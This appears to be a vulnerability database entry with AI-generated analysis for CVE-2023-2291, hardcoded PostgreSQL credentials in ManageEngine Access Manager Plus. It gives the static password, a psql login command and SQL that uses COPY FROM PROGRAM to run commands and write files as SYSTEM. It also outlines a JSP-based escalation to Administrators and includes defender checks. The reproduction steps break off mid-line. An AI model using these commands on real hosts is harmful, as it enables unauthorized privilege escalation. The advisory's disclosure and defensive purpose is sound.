CVE-2023-2291
Description
Static credentials exist in the PostgreSQL data used in ManageEngine Access Manager Plus (AMP) build 4309, ManageEngine Password Manager Pro, and ManageEngine PAM360. These credentials could allow a malicious actor to modify configuration data that would escalate their permissions from that of a low-privileged user to an Administrative user.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Hardcoded PostgreSQL credentials in ManageEngine products allow low-privileged users to execute arbitrary SQL and escalate to admin.
Vulnerability
Hardcoded credentials exist in the PostgreSQL data used in ManageEngine Access Manager Plus (AMP) build 4309, ManageEngine Password Manager Pro, and ManageEngine PAM360 [1]. Specifically, the bundled PostgreSQL server uses the static password "Stonebraker" for the postgres superuser account, and the server listens on localhost [1]. Any user with a local logon on the host can therefore authenticate as the database superuser and run arbitrary SQL, including operations that PostgreSQL reserves for superusers, such as `COPY ... FROM PROGRAM` and `COPY ... TO 'file'`.
Exploitation
An attacker with low-privileged access to the local system can connect to the PostgreSQL database using the known credentials: `psql -h 127.0.0.1 -p 4567 -d AMP -U postgres` (password "Stonebraker"). From there, they can use the `COPY ... FROM PROGRAM` functionality to execute operating system commands in the security context of the postgres.exe process, which runs under the SYSTEM account [1]. For example, they can create a table, copy the output of a command like `whoami` into it, and retrieve the result with a `SELECT` [1].
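The primitive described above, written out as the SQL statements a session as the postgres superuser would run. This is an added example, not code from the advisory or from the product; the table name `cmd_out` and the output path are arbitrary choices, and the file path is a placeholder rather than any real AMP location.

```sql
-- Added example, not from the advisory. Assumed session:
--   psql -h 127.0.0.1 -p 4567 -d AMP -U postgres   (password: Stonebraker)
-- COPY ... FROM PROGRAM and COPY ... TO 'file' are superuser-only operations
-- (on PostgreSQL 11+ also allowed to members of pg_execute_server_program),
-- which is why a shared superuser password turns database access into host
-- access.

-- Scratch table to receive the program's stdout, one row per output line.
CREATE TEMP TABLE cmd_out (line text);

-- The server runs the command through the shell of the postgres.exe process
-- (cmd.exe on Windows) and reads its stdout. CSV format is used because the
-- default text format treats backslashes as escapes and would mangle output
-- such as "nt authority\system".
COPY cmd_out FROM PROGRAM 'whoami' WITH (FORMAT csv);
SELECT line FROM cmd_out;

-- The same privilege also gives a file-write primitive: a query result is
-- written to any path the server process can write to. The path below is a
-- placeholder, not the AMP webapp root used in the actual chain.
COPY (SELECT 'written by the database server' AS marker)
  TO 'C:\Temp\pg_write_test.txt' WITH (FORMAT text);

-- Confirm the write landed by reading the file back through the shell.
TRUNCATE cmd_out;
COPY cmd_out FROM PROGRAM 'type C:\Temp\pg_write_test.txt' WITH (FORMAT csv);
SELECT line FROM cmd_out;
```

The two `COPY` forms are the whole toolkit the later attack chain needs: program execution to run commands and restart services, and file writes to place content where another, more privileged process will pick it up.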
Impact
By executing arbitrary SQL and OS commands, the attacker can modify configuration data stored in the database and on disk, leading to privilege escalation from a low-privileged user to an Administrative user [1]. Commands launched through `COPY ... FROM PROGRAM` run in the security context of the postgres.exe process: the SYSTEM account, but without membership in the local Administrators group (PostgreSQL's Windows service launcher starts the server with a restricted token that drops the Administrators SID, which is consistent with the advisory's observation). The escalation therefore goes through the application rather than directly: the database's file-write and command-execution primitives are used to alter AMP's configuration and web application root so that the AMP service, which does run with administrative privileges, executes the attacker's content and grants full control.
Mitigation
As of the publication date (2023-04-26), no official fix had been announced by Zoho [1]; the advisory recommends contacting ManageEngine support for mitigation assistance [1]. Because the PostgreSQL instance listens on localhost (port 4567 in the affected build) and the attacker already holds a local account, firewall rules on the database port do not address this issue. Until a fix is available, treat the AMP host as a privileged system: remove local logon and Remote Desktop rights for non-administrative users, do not share the host with other workloads or users, and monitor for cmd.exe or psql.exe processes spawned by postgres.exe, which is what `COPY ... FROM PROGRAM` produces. Replacing the postgres password with a per-instance value removes the static credential, but the application's own database configuration must be updated to match, which is why the vendor guidance is to involve support.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- ManageEngine/Access Manager Plus
- Range: =4309
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
Hardcoded static PostgreSQL credentials ("Stonebraker") in ManageEngine AMP allow a low-privileged user to execute arbitrary commands as SYSTEM via the database's COPY FROM PROGRAM feature.
Attack vector
An attacker who already has low-privileged Windows user access to the AMP host can connect to the local PostgreSQL server using the hardcoded credentials (password "Stonebraker") [ref_id=1]. Using PostgreSQL's `COPY FROM PROGRAM` feature, the attacker can copy a malicious JSP file into the AMP webapp root, modify `security-common-onpremise.xml` to bypass the SecurityFilter, and modify `web.xml` to enable the JSP servlet [ref_id=1]. After restarting the AMP service via PostgreSQL, the attacker requests the uploaded JSP, which executes under the AMP service's administrative context and adds the low-privileged user to the local Administrators group [ref_id=1].
Affected code
The PostgreSQL database server bundled with ManageEngine AMP runs under the SYSTEM account and uses the hardcoded password "Stonebraker" for the postgres user [ref_id=1]. The AMP Windows service (Tomcat java.exe) runs with administrative privileges, and the PostgreSQL server can be used to modify AMP configuration files and the web application root [ref_id=1].
What the fix does
No vendor-supplied patch was available at the time of disclosure [ref_id=1]. The advisory recommends contacting ManageEngine support for mitigation assistance [ref_id=1]. A proper fix would involve removing the hardcoded credential from the bundled PostgreSQL configuration and generating a unique password per installation, not exposing a superuser login to the application at all (`COPY ... FROM PROGRAM` and server-side file access are restricted to superusers and, on PostgreSQL 11 and later, members of `pg_execute_server_program` / `pg_read_server_files` / `pg_write_server_files`), and running the database with the least privilege the application needs.
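A defender-side check covering both the Mitigation section above and the fix description here. It is an added example, not vendor guidance or code from the advisory. It assumes the bundled instance is reachable as in the advisory and that the application's own connection settings are updated separately after any password change.

```sql
-- Added defender-side check, not vendor guidance. Assumed session:
--   psql -h 127.0.0.1 -p 4567 -d AMP -U postgres

-- 1. Inventory every login role that can reach COPY ... FROM PROGRAM:
--    all superusers, plus direct members of pg_execute_server_program
--    (that role only exists on PostgreSQL 11 and later; on older servers the
--    EXISTS branch is simply false). Anything beyond the single account the
--    application needs is unexpected and worth investigating.
SELECT r.rolname,
       r.rolsuper,
       r.rolvaliduntil,
       EXISTS (SELECT 1
                 FROM pg_auth_members m
                 JOIN pg_roles g ON g.oid = m.roleid
                WHERE m.member = r.oid
                  AND g.rolname = 'pg_execute_server_program') AS in_exec_program
  FROM pg_roles r
 WHERE r.rolcanlogin
 ORDER BY r.rolname;

-- 2. Show how the server is exposed: the interface it binds and the port
--    (the advisory's instance listens on 127.0.0.1:4567).
SHOW listen_addresses;
SHOW port;

-- 3. List the effective client-authentication rules (pg_hba_file_rules is
--    PostgreSQL 10+). A 'trust' entry for 127.0.0.1 would make the password
--    irrelevant; anything other than a password method for localhost needs
--    an explanation.
SELECT line_number, type, database, user_name, address, auth_method
  FROM pg_hba_file_rules
 ORDER BY line_number;

-- 4. Replace the shared static password with a per-instance secret. The
--    application's own connection configuration must be updated to match,
--    which is product-specific and not shown here.
ALTER ROLE postgres WITH PASSWORD 'replace-with-a-random-per-instance-value';

-- 5. The stored hash cannot be reversed to prove the old value is gone, so
--    verify by reconnecting with the old password, which must now be rejected:
--    PGPASSWORD=Stonebraker psql -h 127.0.0.1 -p 4567 -d AMP -U postgres
```

Steps 1 to 3 are read-only and safe to run on a production instance; step 4 changes the credential the application depends on and should only be run as part of the vendor-coordinated remediation.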
Preconditions
- auth: Attacker must have low-privileged Windows user access (e.g., user1 in Users and Remote Desktop Users) to the AMP host
- network: The local PostgreSQL server must be accessible on 127.0.0.1:4567 with the hardcoded password 'Stonebraker'
- config: The AMP Windows service must be running with administrative privileges
Reproduction
1. Create a low-privileged Windows user (e.g., user1 with membership in Users and Remote Desktop Users).
2. Create a JSP file (test.jsp) containing: `
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions
No linked articles in our index yet.